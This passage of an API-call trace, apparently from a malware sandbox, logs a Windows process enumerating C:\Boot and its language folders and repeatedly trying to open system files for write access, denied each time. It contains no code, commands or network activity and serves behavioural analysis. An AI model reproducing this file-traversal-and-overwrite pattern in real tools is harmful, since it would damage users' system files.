0x7d0a0 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.492] AreFileApisANSI () returned 1 [0084.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\uk-UA\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\uk-UA\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0084.492] AreFileApisANSI () returned 1 [0084.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0084.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 30 [0084.492] CreateFileW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.493] GetFileType (hFile=0x354) returned 0x1 [0084.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.493] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.493] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.493] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.493] CloseHandle (hObject=0x354) returned 1 [0084.493] AreFileApisANSI () returned 1 [0084.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0084.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 30 [0084.493] CreateFileW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.494] GetLastError () returned 0x5 [0084.494] GetLastError () returned 0x5 [0084.494] SetLastError (dwErrCode=0x5) [0084.494] GetLastError () returned 0x5 [0084.494] SetLastError (dwErrCode=0x5) [0084.494] GetLastError () returned 0x5 [0084.494] SetLastError (dwErrCode=0x5) [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.494] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.494] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.494] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68b38, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ⵠ\x01⺊Ā")) returned 0 [0084.494] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0084.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0084.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0084.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0084.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0084.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0084.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0084.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.495] AreFileApisANSI () returned 1 [0084.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\updaterevokesipolicy.p7b", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\updaterevokesipolicy.p7b", lpUsedDefaultChar=0x0) returned 33 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.495] AreFileApisANSI () returned 1 [0084.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0084.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x690d0 [0084.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\updaterevokesipolicy.p7b") returned 33 [0084.495] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.496] GetFileType (hFile=0x364) returned 0x1 [0084.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0084.496] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.496] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.496] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.496] CloseHandle (hObject=0x364) returned 1 [0084.496] AreFileApisANSI () returned 1 [0084.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0084.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x690d0 [0084.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\updaterevokesipolicy.p7b") returned 33 [0084.497] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.497] GetLastError () returned 0x5 [0084.497] GetLastError () returned 0x5 [0084.497] SetLastError (dwErrCode=0x5) [0084.497] GetLastError () returned 0x5 [0084.497] SetLastError (dwErrCode=0x5) [0084.497] GetLastError () returned 0x5 [0084.497] SetLastError (dwErrCode=0x5) [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.497] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0084.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0084.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.498] AreFileApisANSI () returned 1 [0084.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-CN", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-CN", lpUsedDefaultChar=0x0) returned 14 [0084.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.498] AreFileApisANSI () returned 1 [0084.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0084.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-CN") returned 14 [0084.498] CreateFileW (lpFileName="C:\\Boot\\zh-CN" (normalized: "c:\\boot\\zh-cn"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.498] GetLastError () returned 0x5 [0084.498] GetLastError () returned 0x5 [0084.498] SetLastError (dwErrCode=0x5) [0084.498] GetLastError () returned 0x5 [0084.498] SetLastError (dwErrCode=0x5) [0084.498] GetLastError () returned 0x5 [0084.498] SetLastError (dwErrCode=0x5) [0084.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.498] AreFileApisANSI () returned 1 [0084.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0084.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-CN") returned 14 [0084.499] CreateFileW (lpFileName="C:\\Boot\\zh-CN" (normalized: "c:\\boot\\zh-cn"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.499] GetLastError () returned 0x5 [0084.499] GetLastError () returned 0x5 [0084.499] SetLastError (dwErrCode=0x5) [0084.499] GetLastError () returned 0x5 [0084.499] SetLastError (dwErrCode=0x5) [0084.499] GetLastError () returned 0x5 [0084.499] SetLastError (dwErrCode=0x5) [0084.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.499] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0084.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.499] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-CN\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x782d0 [0084.499] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.500] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: 